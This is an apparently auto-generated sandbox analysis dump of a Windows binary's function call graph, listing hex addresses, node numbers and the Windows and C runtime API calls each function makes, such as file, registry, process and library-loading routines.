95566->95568 95569 e84c9d 95567->95569 95570 e46d5a 95567->95570 95568->95426 95572 e5fddb 22 API calls 95569->95572 95577 e46f34 22 API calls 95570->95577 95573 e84ca7 95572->95573 95574 e5fe0b 22 API calls 95573->95574 95575 e84cda 95574->95575 95576->95441 95577->95568 95586->95560 95641 e454c6 95587->95641 95590 e454c6 3 API calls 95591 e5fa9a 95590->95591 95591->95208 95593 e5f14c 95592->95593 95594 e5f188 95592->95594 95593->95594 95596 e5f15b 95593->95596 95595 e4a6c3 22 API calls 95594->95595 95602 eacaeb 95595->95602 95597 e5f170 95596->95597 95600 e5f17d 95596->95600 95647 e5f18e 95597->95647 95598 eacb1a 95598->95222 95654 eacbf2 26 API calls 95600->95654 95602->95598 95655 eaca89 ReadFile SetFilePointerEx 95602->95655 95656 e449bd 22 API calls __fread_nolock 95602->95656 95603 e5f179 95603->95222 95607 e46250 95606->95607 95608 e4625f 95606->95608 95607->95196 95608->95607 95609 e46264 CloseHandle 95608->95609 95609->95607 95611 e4575c CreateFileW 95610->95611 95612 e84035 95610->95612 95613 e4577b 95611->95613 95612->95613 95614 e8403b CreateFileW 95612->95614 95613->95219 95613->95220 95614->95613 95615 e84063 95614->95615 95616 e454c6 3 API calls 95615->95616 95617 e8406e 95616->95617 95617->95613 95619 e453f3 95618->95619 95632 e453f0 ISource 95618->95632 95620 e454c6 3 API calls 95619->95620 95619->95632 95621 e45410 95620->95621 95622 e83f4b 95621->95622 95623 e4541d 95621->95623 95624 e5fa5b 3 API calls 95622->95624 95625 e5fe0b 22 API calls 95623->95625 95624->95632 95626 e45429 95625->95626 95627 e45722 22 API calls 95626->95627 95628 e45433 95627->95628 95629 e49a40 2 API calls 95628->95629 95630 e4543f 95629->95630 95631 e454c6 3 API calls 95630->95631 95631->95632 95632->95228 95633->95234 95634->95232 95635->95235 95636->95239 95637->95191 95638->95191 95639->95218 95640->95230 95642 e454dd 95641->95642 95643 e45564 SetFilePointerEx SetFilePointerEx 95642->95643 95644 e83f9c SetFilePointerEx 95642->95644 95645 e45530 95642->95645 95646 e83f8b 95642->95646 95643->95645 95645->95590 95646->95644 95657 e5f1d8 95647->95657 95653 e5f1c1 95653->95603 95654->95603 95655->95602 95656->95602 95658 e5fe0b 22 API calls 95657->95658 95659 e5f1ef 95658->95659 95660 e5fddb 22 API calls 95659->95660 95661 e5f1a6 95660->95661 95662 e497b6 95661->95662 95669 e49a1e 95662->95669 95665 e497fc 95665->95653 95668 e46e14 24 API calls 95665->95668 95667 e497c7 95667->95665 95676 e49a40 95667->95676 95682 e49b01 22 API calls __fread_nolock 95667->95682 95668->95653 95670 e8f378 95669->95670 95671 e49a2f 95669->95671 95672 e5fddb 22 API calls 95670->95672 95671->95667 95673 e8f382 95672->95673 95674 e5fe0b 22 API calls 95673->95674 95675 e8f397 95674->95675 95677 e49abb 95676->95677 95681 e49a4e 95676->95681 95683 e5e40f SetFilePointerEx 95677->95683 95678 e49a7c 95678->95667 95680 e49a8c ReadFile 95680->95678 95680->95681 95681->95678 95681->95680 95682->95667 95683->95681 95684->95285 95685->95291 95686->95288 95687->95296 95688->95296 95690 eadbdc GetFileAttributesW 95689->95690 95691 ead4d5 95689->95691 95690->95691 95692 eadbe8 FindFirstFileW 95690->95692 95691->94994 95692->95691 95693 eadbf9 FindClose 95692->95693 95693->95691 95695 e47510 53 API calls 95694->95695 95696 ec7f90 95695->95696 95719 ec7fd5 ISource 95696->95719 95732 ec8cd3 95696->95732 95698 ec8281 95699 ec844f 95698->95699 95704 ec828f 95698->95704 95773 ec8ee4 60 API calls 95699->95773 95702 ec845e 95703 ec846a 95702->95703 95702->95704 95703->95719 95745 ec7e86 95704->95745 95705 e47510 53 API calls 95722 ec8049 95705->95722 95710 ec82c8 95760 e5fc70 95710->95760 95713 ec82e8 95766 eb359c 82 API calls __wsopen_s 95713->95766 95714 ec8302 95767 e463eb 22 API calls 95714->95767 95717 ec82f3 GetCurrentProcess TerminateProcess 95717->95714 95718 ec8311 95768 e46a50 22 API calls 95718->95768 95719->95303 95721 ec832a 95731 ec8352 95721->95731 95769 e504f0 22 API calls 95721->95769 95722->95698 95722->95705 95722->95719 95764 ea417d 22 API calls __fread_nolock 95722->95764 95765 ec851d 42 API calls _strftime 95722->95765 95724 ec84c5 95724->95719 95726 ec84d9 FreeLibrary 95724->95726 95725 ec8341 95770 ec8b7b 75 API calls 95725->95770 95726->95719 95731->95724 95771 e504f0 22 API calls 95731->95771 95772 e4aceb 23 API calls ISource 95731->95772 95774 ec8b7b 75 API calls 95731->95774 95733 e4aec9 22 API calls 95732->95733 95734 ec8cee CharLowerBuffW 95733->95734 95775 ea8e54 95734->95775 95738 e4a961 22 API calls 95739 ec8d2a 95738->95739 95740 e46d25 22 API calls 95739->95740 95741 ec8d3e 95740->95741 95742 e493b2 22 API calls 95741->95742 95744 ec8d48 _wcslen 95742->95744 95743 ec8e5e _wcslen 95743->95722 95744->95743 95782 ec851d 42 API calls _strftime 95744->95782 95746 ec7ea1 95745->95746 95750 ec7eec 95745->95750 95747 e5fe0b 22 API calls 95746->95747 95748 ec7ec3 95747->95748 95749 e5fddb 22 API calls 95748->95749 95748->95750 95749->95748 95751 ec9096 95750->95751 95752 ec92ab ISource 95751->95752 95759 ec90ba _strcat _wcslen 95751->95759 95752->95710 95753 e4b567 39 API calls 95753->95759 95754 e4b6b5 39 API calls 95754->95759 95755 e4b38f 39 API calls 95755->95759 95756 e47510 53 API calls 95756->95759 95757 e6ea0c 21 API calls ___std_exception_copy 95757->95759 95759->95752 95759->95753 95759->95754 95759->95755 95759->95756 95759->95757 95785 eaefae 24 API calls _wcslen 95759->95785 95762 e5fc85 95760->95762 95761 e5fd1d VirtualAlloc 95763 e5fceb 95761->95763 95762->95761 95762->95763 95763->95713 95763->95714 95764->95722 95765->95722 95766->95717 95767->95718 95768->95721 95769->95725 95770->95731 95771->95731 95772->95731 95773->95702 95774->95731 95776 ea8e74 _wcslen 95775->95776 95777 ea8f63 95776->95777 95780 ea8ea9 95776->95780 95781 ea8f68 95776->95781 95777->95738 95777->95744 95780->95777 95783 e5ce60 41 API calls 95780->95783 95781->95777 95784 e5ce60 41 API calls 95781->95784 95782->95743 95783->95780 95784->95781 95785->95759 95787 e4ae01 95786->95787 95790 e4ae1c ISource 95786->95790 95788 e4aec9 22 API calls 95787->95788 95789 e4ae09 CharUpperBuffW 95788->95789 95789->95790 95790->95007 95792 e4acae 95791->95792 95793 e4acd1 95792->95793 95821 eb359c 82 API calls __wsopen_s 95792->95821 95793->95059 95796 e8fadb 95795->95796 95797 e4ad92 95795->95797 95798 e5fddb 22 API calls 95797->95798 95799 e4ad99 95798->95799 95822 e4adcd 95799->95822 95802->95056 95803->95060 95804->95060 95805->95011 95806->95048 95807->95018 95808->95048 95809->95048 95810->95059 95811->95059 95812->95059 95813->95059 95814->95059 95815->95059 95816->95040 95817->95048 95818->95044 95819->95055 95820->95048 95821->95793 95828 e4addd 95822->95828 95823 e4adb6 95823->95059 95824 e5fddb 22 API calls 95824->95828 95825 e4a961 22 API calls 95825->95828 95826 e4a8c7 22 API calls 95826->95828 95827 e4adcd 22 API calls 95827->95828 95828->95823 95828->95824 95828->95825 95828->95826 95828->95827 95829 e43156 95832 e43170 95829->95832 95833 e43187 95832->95833 95834 e4318c 95833->95834 95835 e431eb 95833->95835 95872 e431e9 95833->95872 95839 e43265 PostQuitMessage 95834->95839 95840 e43199 95834->95840 95837 e82dfb 95835->95837 95838 e431f1 95835->95838 95836 e431d0 DefWindowProcW 95874 e4316a 95836->95874 95881 e418e2 10 API calls 95837->95881 95843 e4321d SetTimer RegisterWindowMessageW 95838->95843 95844 e431f8 95838->95844 95839->95874 95841 e431a4 95840->95841 95842 e82e7c 95840->95842 95847 e82e68 95841->95847 95848 e431ae 95841->95848 95887 eabf30 34 API calls ___scrt_fastfail 95842->95887 95849 e43246 CreatePopupMenu 95843->95849 95843->95874 95851 e82d9c 95844->95851 95852 e43201 KillTimer 95844->95852 95846 e82e1c 95882 e5e499 42 API calls 95846->95882 95886 eac161 27 API calls ___scrt_fastfail 95847->95886 95854 e82e4d 95848->95854 95855 e431b9 95848->95855 95849->95874 95857 e82da1 95851->95857 95858 e82dd7 MoveWindow 95851->95858 95877 e430f2 Shell_NotifyIconW ___scrt_fastfail 95852->95877 95854->95836 95885 ea0ad7 22 API calls 95854->95885 95862 e431c4 95855->95862 95863 e43253 95855->95863 95856 e82e8e 95856->95836 95856->95874 95864 e82dc6 SetFocus 95857->95864 95865 e82da7 95857->95865 95858->95874 95861 e43263 95861->95874 95862->95836 95883 e430f2 Shell_NotifyIconW ___scrt_fastfail 95862->95883 95879 e4326f 44 API calls ___scrt_fastfail 95863->95879 95864->95874 95865->95862 95868 e82db0 95865->95868 95866 e43214 95878 e43c50 DeleteObject DestroyWindow 95866->95878 95880 e418e2 10 API calls 95868->95880 95872->95836 95875 e82e41 95884 e43837 49 API calls ___scrt_fastfail 95875->95884 95877->95866 95878->95874 95879->95861 95880->95874 95881->95846 95882->95862 95883->95875 95884->95872 95885->95872 95886->95861 95887->95856 95888 e42e37 95889 e4a961 22 API calls 95888->95889 95890 e42e4d 95889->95890 95967 e44ae3 95890->95967 95892 e42e6b 95893 e43a5a 24 API calls 95892->95893 95894 e42e7f 95893->95894 95895 e49cb3 22 API calls 95894->95895 95896 e42e8c 95895->95896 95897 e44ecb 94 API calls 95896->95897 95898 e42ea5 95897->95898 95899 e82cb0 95898->95899 95900 e42ead 95898->95900 95901 eb2cf9 80 API calls 95899->95901 95904 e4a8c7 22 API calls 95900->95904 95902 e82cc3 95901->95902 95903 e82ccf 95902->95903 95906 e44f39 68 API calls 95902->95906 95909 e44f39 68 API calls 95903->95909 95905 e42ec3 95904->95905 95981 e46f88 22 API calls 95905->95981 95906->95903 95908 e42ecf 95910 e49cb3 22 API calls 95908->95910 95911 e82ce5 95909->95911 95912 e42edc 95910->95912 95997 e43084 22 API calls 95911->95997 95982 e4a81b 41 API calls 95912->95982 95915 e42eec 95917 e49cb3 22 API calls 95915->95917 95916 e82d02 95998 e43084 22 API calls 95916->95998 95919 e42f12 95917->95919 95983 e4a81b 41 API calls 95919->95983 95920 e82d1e 95922 e43a5a 24 API calls 95920->95922 95923 e82d44 95922->95923 95999 e43084 22 API calls 95923->95999 95924 e42f21 95926 e4a961 22 API calls 95924->95926 95928 e42f3f 95926->95928 95927 e82d50 95929 e4a8c7 22 API calls 95927->95929 95984 e43084 22 API calls 95928->95984 95931 e82d5e 95929->95931 96000 e43084 22 API calls 95931->96000 95932 e42f4b 95985 e64a28 40 API calls 3 library calls 95932->95985 95934 e82d6d 95938 e4a8c7 22 API calls 95934->95938 95936 e42f59 95936->95911 95937 e42f63 95936->95937 95986 e64a28 40 API calls 3 library calls 95937->95986 95940 e82d83 95938->95940 96001 e43084 22 API calls 95940->96001 95941 e42f6e 95941->95916 95943 e42f78 95941->95943 95987 e64a28 40 API calls 3 library calls 95943->95987 95944 e82d90 95946 e42f83 95946->95920 95947 e42f8d 95946->95947 95988 e64a28 40 API calls 3 library calls 95947->95988 95949 e42f98 95950 e42fdc 95949->95950 95989 e43084 22 API calls 95949->95989 95950->95934 95951 e42fe8 95950->95951 95951->95944 95991 e463eb 22 API calls 95951->95991 95953 e42fbf 95955 e4a8c7 22 API calls 95953->95955 95957 e42fcd 95955->95957 95956 e42ff8 95992 e46a50 22 API calls 95956->95992 95990 e43084 22 API calls 95957->95990 95960 e43006 95993 e470b0 23 API calls 95960->95993 95964 e43021 95965 e43065 95964->95965 95994 e46f88 22 API calls 95964->95994 95995 e470b0 23 API calls 95964->95995 95996 e43084 22 API calls 95964->95996 95968 e44af0 __wsopen_s 95967->95968 95969 e46b57 22 API calls 95968->95969 95970 e44b22 95968->95970 95969->95970 95971 e44c6d 22 API calls 95970->95971 95979 e44b58 95970->95979 95971->95970 95972 e49cb3 22 API calls 95974 e44c52 95972->95974 95973 e49cb3 22 API calls 95973->95979 95975 e4515f 22 API calls 95974->95975 95978 e44c5e 95975->95978 95976 e44c6d 22 API calls 95976->95979 95977 e4515f 22 API calls 95977->95979 95978->95892 95979->95973 95979->95976 95979->95977 95980 e44c29 95979->95980 95980->95972 95980->95978 95981->95908 95982->95915 95983->95924 95984->95932 95985->95936 95986->95941 95987->95946 95988->95949 95989->95953 95990->95950 95991->95956 95992->95960 95993->95964 95994->95964 95995->95964 95996->95964 95997->95916 95998->95920 95999->95927 96000->95934 96001->95944 96002 e41033 96007 e44c91 96002->96007 96006 e41042 96008 e4a961 22 API calls 96007->96008 96009 e44cff 96008->96009 96015 e43af0 96009->96015 96011 e44d9c 96012 e41038 96011->96012 96018 e451f7 22 API calls __fread_nolock 96011->96018 96014 e600a3 29 API calls __onexit 96012->96014 96014->96006 96019 e43b1c 96015->96019 96018->96011 96020 e43b0f 96019->96020 96021 e43b29 96019->96021 96020->96011 96021->96020 96022 e43b30 RegOpenKeyExW 96021->96022 96022->96020 96023 e43b4a RegQueryValueExW 96022->96023 96024 e43b80 RegCloseKey 96023->96024 96025 e43b6b 96023->96025 96024->96020 96025->96024 96026 e50b9d 96035 e50ba6 __fread_nolock 96026->96035 96027 e47510 53 API calls 96027->96035 96028 e95cb8 96038 e44a88 22 API calls __fread_nolock 96028->96038 96030 e95cc4 96034 e4a8c7 22 API calls 96030->96034 96036 e50847 __fread_nolock 96030->96036 96031 e50bf7 96033 e4a587 22 API calls 96031->96033 96032 e5fddb 22 API calls 96032->96035 96033->96036 96034->96036 96035->96027 96035->96028 96035->96031 96035->96032 96035->96036 96037 e5fe0b 22 API calls 96035->96037 96037->96035 96038->96030 96039 e72e7d 96047 e73162 96039->96047 96042 e72e91 96044 e72e99 96045 e72ea6 96044->96045 96055 e72ea9 11 API calls 96044->96055 96048 e72fd7 _free 5 API calls 96047->96048 96049 e73189 96048->96049 96050 e73192 96049->96050 96051 e731a1 TlsAlloc 96049->96051 96052 e60a8c _ValidateLocalCookies 5 API calls 96050->96052 96051->96050 96053 e72e87 96052->96053 96053->96042 96054 e72df8 20 API calls _free 96053->96054 96054->96044 96055->96042 96056 e7cabc 96057 e7cace 96056->96057 96058 e7cac5 96056->96058 96060 e7c9bb 96058->96060 96061 e72d74 FindHandler 38 API calls 96060->96061 96062 e7c9c8 96061->96062 96080 e7cada 96062->96080 96064 e7c9d0 96089 e7c74f 96064->96089 96067 e73820 __fread_nolock 21 API calls 96068 e7c9f8 96067->96068 96079 e7ca2a 96068->96079 96096 e7cb7c 96068->96096 96071 e729c8 _free 20 API calls 96073 e7c9e7 96071->96073 96072 e7ca25 96106 e6f2d9 20 API calls _free 96072->96106 96073->96057 96075 e7ca6e 96075->96079 96107 e7c625 26 API calls 96075->96107 96076 e7ca42 96076->96075 96077 e729c8 _free 20 API calls 96076->96077 96077->96075 96079->96071 96081 e7cae6 __FrameHandler3::FrameUnwindToState 96080->96081 96082 e72d74 FindHandler 38 API calls 96081->96082 96087 e7caf0 96082->96087 96084 e7cb74 __fread_nolock 96084->96064 96087->96084 96088 e729c8 _free 20 API calls 96087->96088 96108 e728a7 38 API calls _abort 96087->96108 96109 e72f5e EnterCriticalSection 96087->96109 96110 e7cb6b LeaveCriticalSection _abort 96087->96110 96088->96087 96111 e649a5 96089->96111 96092 e7c782 96094 e7c787 GetACP 96092->96094 96095 e7c799 96092->96095 96093 e7c770 GetOEMCP 96093->96095 96094->96095 96095->96067 96095->96073 96097 e7c74f 40 API calls 96096->96097 96098 e7cb9b 96097->96098 96101 e7cbec IsValidCodePage 96098->96101 96103 e7cba2 96098->96103 96105 e7cc11 ___scrt_fastfail 96098->96105 96099 e60a8c _ValidateLocalCookies 5 API calls 96100 e7ca1d 96099->96100 96100->96072 96100->96076 96102 e7cbfe GetCPInfo 96101->96102 96101->96103 96102->96103 96102->96105 96103->96099 96121 e7c827 GetCPInfo 96105->96121 96106->96079 96107->96079 96109->96087 96110->96087 96112 e649c2 96111->96112 96118 e649b8 96111->96118 96113 e72d74 FindHandler 38 API calls 96112->96113 96112->96118 96114 e649e3 96113->96114 96119 e72ec3 38 API calls __cftof 96114->96119 96116 e649fc 96120 e72ef0 38 API calls __cftof 96116->96120 96118->96092 96118->96093 96119->96116 96120->96118 96122 e7c90b 96121->96122 96126 e7c861 96121->96126 96125 e60a8c _ValidateLocalCookies 5 API calls 96122->96125 96128 e7c9b7 96125->96128 96131 e7d8c3 96126->96131 96128->96103 96130 e7641b 43 API calls 96130->96122 96132 e649a5 __cftof 38 API calls 96131->96132 96133 e7d8e3 MultiByteToWideChar 96132->96133 96135 e7d921 96133->96135 96136 e7d9b9 96133->96136 96138 e73820 __fread_nolock 21 API calls 96135->96138 96141 e7d942 _strftime ___scrt_fastfail 96135->96141 96137 e60a8c _ValidateLocalCookies 5 API calls 96136->96137 96139 e7c8c2 96137->96139 96138->96141 96145 e7641b 96139->96145 96140 e7d9b3 96150 e71537 20 API calls _free 96140->96150 96141->96140 96143 e7d987 MultiByteToWideChar 96141->96143 96143->96140 96144 e7d9a3 GetStringTypeW 96143->96144 96144->96140 96146 e649a5 __cftof 38 API calls 96145->96146 96147 e7642e 96146->96147 96151 e761fe 96147->96151 96150->96136 96152 e76219 96151->96152 96153 e7623f MultiByteToWideChar 96152->96153 96154 e76269 96153->96154 96165 e763f3 96153->96165 96157 e7628a _strftime 96154->96157 96158 e73820 __fread_nolock 21 API calls 96154->96158 96155 e60a8c _ValidateLocalCookies 5 API calls 96156 e76406 96155->96156 96156->96130 96159 e762d3 MultiByteToWideChar 96157->96159 96161 e7633f 96157->96161 96158->96157 96160 e762ec 96159->96160 96159->96161 96178 e73467 96160->96178 96187 e71537 20 API calls _free 96161->96187 96165->96155 96166 e76316 96166->96161 96168 e73467 _strftime 11 API calls 96166->96168 96167 e7634e 96170 e73820 __fread_nolock 21 API calls 96167->96170 96173 e7636f _strftime 96167->96173 96168->96161 96169 e763e4 96186 e71537 20 API calls _free 96169->96186 96170->96173 96171 e73467 _strftime 11 API calls 96174 e763c3 96171->96174 96173->96169 96173->96171 96174->96169 96175 e763d2 WideCharToMultiByte 96174->96175 96175->96169 96176 e76412 96175->96176 96188 e71537 20 API calls _free 96176->96188 96179 e72fd7 _free 5 API calls 96178->96179 96180 e7348e 96179->96180 96183 e73497 96180->96183 96189 e734ef 10 API calls 3 library calls 96180->96189 96182 e734d7 LCMapStringW 96182->96183 96184 e60a8c _ValidateLocalCookies 5 API calls 96183->96184 96185 e734e9 96184->96185 96185->96161 96185->96166 96185->96167 96186->96161 96187->96165 96188->96161 96189->96182 96190 e4f7bf 96191 e4fcb6 96190->96191 96192 e4f7d3 96190->96192 96226 e4aceb 23 API calls ISource 96191->96226 96194 e4fcc2 96192->96194 96195 e5fddb 22 API calls 96192->96195 96227 e4aceb 23 API calls ISource 96194->96227 96197 e4f7e5 96195->96197 96197->96194 96198 e4f83e 96197->96198 96199 e4fd3d 96197->96199 96201 e51310 256 API calls 96198->96201 96217 e4ed9d ISource 96198->96217 96228 eb1155 22 API calls 96199->96228 96223 e4ec76 ISource 96201->96223 96202 e4fef7 96210 e4a8c7 22 API calls 96202->96210 96202->96217 96203 e506a0 41 API calls 96203->96223 96204 e5fddb 22 API calls 96204->96223 96206 e94b0b 96230 eb359c 82 API calls __wsopen_s 96206->96230 96207 e4a8c7 22 API calls 96207->96223 96208 e94600 96212 e4a8c7 22 API calls 96208->96212 96208->96217 96210->96217 96212->96217 96214 e60242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96214->96223 96215 e4fbe3 96215->96217 96218 e94bdc 96215->96218 96224 e4f3ae ISource 96215->96224 96216 e4a961 22 API calls 96216->96223 96231 eb359c 82 API calls __wsopen_s 96218->96231 96220 e601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96220->96223 96221 e94beb 96232 eb359c 82 API calls __wsopen_s 96221->96232 96222 e600a3 29 API calls pre_c_initialization 96222->96223 96223->96202 96223->96203 96223->96204 96223->96206 96223->96207 96223->96208 96223->96214 96223->96215 96223->96216 96223->96217 96223->96220 96223->96221 96223->96222 96223->96224 96225 e501e0 256 API calls 2 library calls 96223->96225 96224->96217 96229 eb359c 82 API calls __wsopen_s 96224->96229 96225->96223 96226->96194 96227->96199 96228->96217 96229->96217 96230->96217 96231->96221 96232->96217 96233 e41098 96238 e442de 96233->96238 96237 e410a7 96239 e4a961 22 API calls 96238->96239 96240 e442f5 GetVersionExW 96239->96240 96241 e46b57 22 API calls 96240->96241 96242 e44342 96241->96242 96243 e493b2 22 API calls 96242->96243 96255 e44378 96242->96255 96244 e4436c 96243->96244 96246 e437a0 22 API calls 96244->96246 96245 e4441b GetCurrentProcess IsWow64Process 96247 e44437 96245->96247 96246->96255 96248 e4444f LoadLibraryA 96247->96248 96249 e83824 GetSystemInfo 96247->96249 96250 e44460 GetProcAddress 96248->96250 96251 e4449c GetSystemInfo 96248->96251 96250->96251 96254 e44470 GetNativeSystemInfo 96250->96254 96252 e44476 96251->96252 96256 e4109d 96252->96256 96257 e4447a FreeLibrary 96252->96257 96253 e837df 96254->96252 96255->96245 96255->96253 96258 e600a3 29 API calls __onexit 96256->96258 96257->96256 96258->96237 96259 e790fa 96260 e79107 96259->96260 96263 e7911f 96259->96263 96309 e6f2d9 20 API calls _free 96260->96309 96262 e7910c 96310 e727ec 26 API calls __cftof 96262->96310 96265 e7917a 96263->96265 96266 e79117 96263->96266 96311 e7fdc4 21 API calls 2 library calls 96263->96311 96268 e6d955 __fread_nolock 26 API calls 96265->96268 96269 e79192 96268->96269 96279 e78c32 96269->96279 96271 e79199 96271->96266 96272 e6d955 __fread_nolock 26 API calls 96271->96272 96273 e791c5 96272->96273 96273->96266 96274 e6d955 __fread_nolock 26 API calls 96273->96274 96275 e791d3 96274->96275 96275->96266 96276 e6d955 __fread_nolock 26 API calls 96275->96276 96277 e791e3 96276->96277 96278 e6d955 __fread_nolock 26 API calls 96277->96278 96278->96266 96280 e78c3e __FrameHandler3::FrameUnwindToState 96279->96280 96281 e78c46 96280->96281 96282 e78c5e 96280->96282 96313 e6f2c6 20 API calls _free 96281->96313 96284 e78d24 96282->96284 96289 e78c97 96282->96289 96320 e6f2c6 20 API calls _free 96284->96320 96286 e78c4b 96314 e6f2d9 20 API calls _free 96286->96314 96287 e78d29 96321 e6f2d9 20 API calls _free 96287->96321 96291 e78ca6 96289->96291 96292 e78cbb 96289->96292 96315 e6f2c6 20 API calls _free 96291->96315 96312 e75147 EnterCriticalSection 96292->96312 96294 e78cb3 96322 e727ec 26 API calls __cftof 96294->96322 96296 e78cab 96316 e6f2d9 20 API calls _free 96296->96316 96297 e78cc1 96299 e78cf2 96297->96299 96300 e78cdd 96297->96300 96304 e78d45 __fread_nolock 38 API calls 96299->96304 96317 e6f2d9 20 API calls _free 96300->96317 96302 e78c53 __fread_nolock 96302->96271 96306 e78ced 96304->96306 96305 e78ce2 96318 e6f2c6 20 API calls _free 96305->96318 96319 e78d1c LeaveCriticalSection __wsopen_s 96306->96319 96309->96262 96310->96266 96311->96265 96312->96297 96313->96286 96314->96302 96315->96296 96316->96294 96317->96305 96318->96306 96319->96302 96320->96287 96321->96294 96322->96302 96323 e603fb 96324 e60407 __FrameHandler3::FrameUnwindToState 96323->96324 96352 e5feb1 96324->96352 96326 e6040e 96327 e60561 96326->96327 96330 e60438 96326->96330 96379 e6083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96327->96379 96329 e60568 96380 e64e52 28 API calls _abort 96329->96380 96341 e60477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96330->96341 96363 e7247d 96330->96363 96332 e6056e 96381 e64e04 28 API calls _abort 96332->96381 96336 e60576 96337 e60457 96339 e604d8 96371 e60959 96339->96371 96341->96339 96375 e64e1a 38 API calls 3 library calls 96341->96375 96343 e604de 96344 e604f3 96343->96344 96376 e60992 GetModuleHandleW 96344->96376 96346 e604fa 96346->96329 96347 e604fe 96346->96347 96348 e60507 96347->96348 96377 e64df5 28 API calls _abort 96347->96377 96378 e60040 13 API calls 2 library calls 96348->96378 96351 e6050f 96351->96337 96353 e5feba 96352->96353 96382 e60698 IsProcessorFeaturePresent 96353->96382 96355 e5fec6 96383 e62c94 96355->96383 96357 e5fecb 96362 e5fecf 96357->96362 96392 e72317 96357->96392 96360 e5fee6 96360->96326 96362->96326 96365 e72494 96363->96365 96364 e60a8c _ValidateLocalCookies 5 API calls 96366 e60451 96364->96366 96365->96364 96366->96337 96367 e72421 96366->96367 96368 e72450 96367->96368 96369 e60a8c _ValidateLocalCookies 5 API calls 96368->96369 96370 e72479 96369->96370 96370->96341 96477 e62340 96371->96477 96373 e6096c GetStartupInfoW 96374 e6097f 96373->96374 96374->96343 96375->96339 96376->96346 96377->96348 96378->96351 96379->96329 96380->96332 96381->96336 96382->96355 96384 e62c99 ___vcrt_initialize_winapi_thunks 96383->96384 96396 e63462 96384->96396 96388 e62caf 96389 e62cba 96388->96389 96410 e6349e DeleteCriticalSection 96388->96410 96389->96357 96391 e62ca7 96391->96357 96438 e7d1f6 96392->96438 96395 e62cbd 8 API calls 3 library calls 96395->96362 96398 e6346b 96396->96398 96399 e63494 96398->96399 96400 e62ca3 96398->96400 96411 e636ef 96398->96411 96416 e6349e DeleteCriticalSection 96399->96416 96400->96391 96402 e63414 96400->96402 96431 e63600 96402->96431 96405 e63429 96405->96388 96407 e63437 96408 e63444 96407->96408 96437 e63447 6 API calls ___vcrt_FlsFree 96407->96437 96408->96388 96410->96391 96417 e63591 96411->96417 96413 e63709 96414 e63727 InitializeCriticalSectionAndSpinCount 96413->96414 96415 e63712 96413->96415 96414->96415 96415->96398 96416->96400 96418 e635b5 __crt_fast_encode_pointer 96417->96418 96419 e635b9 96417->96419 96418->96413 96419->96418 96424 e634cd 96419->96424 96422 e635d3 GetProcAddress 96422->96418 96423 e635e3 __crt_fast_encode_pointer 96422->96423 96423->96418 96429 e634dc try_get_first_available_module 96424->96429 96425 e634f9 LoadLibraryExW 96427 e63514 GetLastError 96425->96427 96425->96429 96426 e63586 96426->96418 96426->96422 96427->96429 96428 e6356f FreeLibrary 96428->96429 96429->96425 96429->96426 96429->96428 96430 e63547 LoadLibraryExW 96429->96430 96430->96429 96432 e63591 try_get_function 5 API calls 96431->96432 96433 e6361a 96432->96433 96434 e63633 TlsAlloc 96433->96434 96435 e6341e 96433->96435 96435->96405 96436 e636b1 6 API calls try_get_function 96435->96436 96436->96407 96437->96405 96439 e7d213 96438->96439 96442 e7d20f 96438->96442 96439->96442 96444 e74bfb 96439->96444 96440 e60a8c _ValidateLocalCookies 5 API calls 96441 e5fed8 96440->96441 96441->96360 96441->96395 96442->96440 96445 e74c07 __FrameHandler3::FrameUnwindToState 96444->96445 96456 e72f5e EnterCriticalSection 96445->96456 96447 e74c0e 96457 e750af 96447->96457 96449 e74c1d 96450 e74c2c 96449->96450 96470 e74a8f 29 API calls 96449->96470 96472 e74c48 LeaveCriticalSection _abort 96450->96472 96453 e74c27 96471 e74b45 GetStdHandle GetFileType 96453->96471 96454 e74c3d __fread_nolock 96454->96439 96456->96447 96458 e750bb __FrameHandler3::FrameUnwindToState 96457->96458 96459 e750df 96458->96459 96460 e750c8 96458->96460 96473 e72f5e EnterCriticalSection 96459->96473 96474 e6f2d9 20 API calls _free 96460->96474 96463 e750cd 96475 e727ec 26 API calls __cftof 96463->96475 96465 e750d7 __fread_nolock 96465->96449 96466 e75117 96476 e7513e LeaveCriticalSection _abort 96466->96476 96467 e750eb 96467->96466 96469 e75000 __wsopen_s 21 API calls 96467->96469 96469->96467 96470->96453 96471->96450 96472->96454 96473->96467 96474->96463 96475->96465 96476->96465 96477->96373 96478 e4105b 96483 e4344d 96478->96483 96480 e4106a 96514 e600a3 29 API calls __onexit 96480->96514 96482 e41074 96484 e4345d __wsopen_s 96483->96484 96485 e4a961 22 API calls 96484->96485 96486 e43513 96485->96486 96487 e43a5a 24 API calls 96486->96487 96488 e4351c 96487->96488 96515 e43357 96488->96515 96491 e433c6 22 API calls 96492 e43535 96491->96492 96493 e4515f 22 API calls 96492->96493 96494 e43544 96493->96494 96495 e4a961 22 API calls 96494->96495 96496 e4354d 96495->96496 96497 e4a6c3 22 API calls 96496->96497 96498 e43556 RegOpenKeyExW 96497->96498 96499 e83176 RegQueryValueExW 96498->96499 96503 e43578 96498->96503 96500 e8320c RegCloseKey 96499->96500 96501 e83193 96499->96501 96500->96503 96513 e8321e _wcslen 96500->96513 96502 e5fe0b 22 API calls 96501->96502 96504 e831ac 96502->96504 96503->96480 96506 e45722 22 API calls 96504->96506 96505 e44c6d 22 API calls 96505->96513 96507 e831b7 RegQueryValueExW 96506->96507 96508 e831d4 96507->96508 96510 e831ee ISource 96507->96510 96509 e46b57 22 API calls 96508->96509 96509->96510 96510->96500 96511 e49cb3 22 API calls 96511->96513 96512 e4515f 22 API calls 96512->96513 96513->96503 96513->96505 96513->96511 96513->96512 96514->96482 96516 e81f50 __wsopen_s 96515->96516 96517 e43364 GetFullPathNameW 96516->96517 96518 e43386 96517->96518 96519 e46b57 22 API calls 96518->96519 96520 e433a4 96519->96520 96520->96491

                                          Executed Functions

                                          Function 00E442DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
